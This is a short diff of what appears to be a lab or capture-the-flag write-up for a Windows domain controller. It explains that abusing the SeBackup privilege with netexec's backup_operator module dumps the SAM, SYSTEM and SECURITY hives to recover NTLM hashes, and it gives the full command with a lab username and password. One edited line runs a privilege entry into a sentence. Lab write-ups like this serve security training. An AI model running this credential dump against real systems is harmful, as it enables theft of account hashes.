Overview#

 SeChangeNotifyPrivilege Bypass traverse checking Enabled

-With those privileges set we are able to backup and modify (through restore) any file on the file system.
+SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWith those privileges we are able to backup and modify (through restore) any file on the file system.

-netexec has a built in module to exploit the SeBackup privilege by copying and dumping Windows Registry Hives SAM, SYSTEM, SECURITY which gives us all NTLM hashes stored within:
+netexec has a built in module to exploit the SeBackup privilege remotely by copying and dumping Windows Registry Hives SAM, SYSTEM, SECURITY which gives us all NTLM hashes stored within:

 netexec smb BabyDC.baby.vl -u 'caroline.robinson' -p 'Password123!' -M backup_operator